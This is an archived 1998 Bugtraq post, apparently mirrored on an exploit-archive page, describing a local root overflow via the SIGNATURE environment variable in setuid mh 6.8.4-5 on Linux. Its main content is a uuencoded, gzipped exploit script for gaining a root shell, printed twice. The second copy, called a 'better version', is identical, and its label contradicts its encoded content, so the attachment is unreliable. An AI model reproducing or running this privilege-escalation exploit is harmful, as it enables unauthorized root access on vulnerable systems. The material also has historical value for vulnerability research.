Linux Mailhandler overflow
Description: | the Mailhandler (mh) ver 6.8.4-5 has an overflow relating to the SIGNATURE environmental variable . I think RedHat 5 among other distributions are vulnerable. |
Author: | Catalin Mitrofan <md@LSPVS.SOROSIS.RO> |
Compromise: | root (local) |
Vulnerable Systems: | Those running mh version 6.8.4-5 suid. |
Date: | 21 March 1998 |
Date: Sat, 21 Mar 1998 19:50:55 +0200
From: Catalin Mitrofan <md@LSPVS.SOROSIS.RO>
To: BUGTRAQ@NETSPACE.ORG
Subject: An exploit for linux mh ver 6.8.4-5 ( update ) ...
host (user):~>. .mh_profile
bash#
[Part 2, "" Application/X-GUNZIP 462bytes]
[Unable to print this part]
begin 600 mh_profile_exploit.sh.gz
M'XL("*P'6C4``VUH7W!R;V9I;&5?97AP;&]I="YS:`#MVK]+`F$<QW&:$G5O
M_9XM27%RJR`ID>'BT"^<PM++Y^C.1^XY-3?';A#\4X3&AJ2F!J&]?R!H[`^X
MR`JBW:GW"]Y?>*;G'_AL6H4+KULP*NU>]W082:,T!0``````````````````
M``#@?W@KGSGSF^IZ/$C%U>QL-WYP7FXSSM-B'#_O57ZN,X\?9QO3J3.?V<N;
MB=\G]=3D-+L8O]XE2?)GFG]4.ZA7CD\.]TNY8KX:ZJ`8M,N^Z0V,;72HC6?L
M4$M-E.ZY$BG/R-#S?>FXD8QT7\XEU#H2HUS?MVU;ML2[E*Z.=B0*1U)LJ4"W
MI;]MI#E47DM)8#HM==44R[(D+VM)<K_:[%5_0$1$1$1$1$1$1$1$1$1$1)_E
?TH6^"9>SA$`5O@8"Z7[7N+_&"=_OQ@<,&PXO6E``````
`
end
Here is a supposedly better version of the exploit:
begin 600 mh_profile_exploit.sh
M'XL("*P'6C4``VUH7W!R;V9I;&5?97AP;&]I="YS:`#MVK]+`F$<QW&:$G5O
M_9XM27%RJR`ID>'BT"^<PM++Y^C.1^XY-3?';A#\4X3&AJ2F!J&]?R!H[`^X
MR`JBW:GW"]Y?>*;G'_AL6H4+KULP*NU>]W082:,T!0``````````````````
M``#@?W@KGSGSF^IZ/$C%U>QL-WYP7FXSSM-B'#_O57ZN,X\?9QO3J3.?V<N;
MB=\G]=3D-+L8O]XE2?)GFG]4.ZA7CD\.]TNY8KX:ZJ`8M,N^Z0V,;72HC6?L
M4$M-E.ZY$BG/R-#S?>FXD8QT7\XEU#H2HUS?MVU;ML2[E*Z.=B0*1U)LJ4"W
MI;]MI#E47DM)8#HM==44R[(D+VM)<K_:[%5_0$1$1$1$1$1$1$1$1$1$1)_E
?TH6^"9>SA$`5O@8"Z7[7N+_&"=_OQ@<,&PXO6E``````
`
end
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: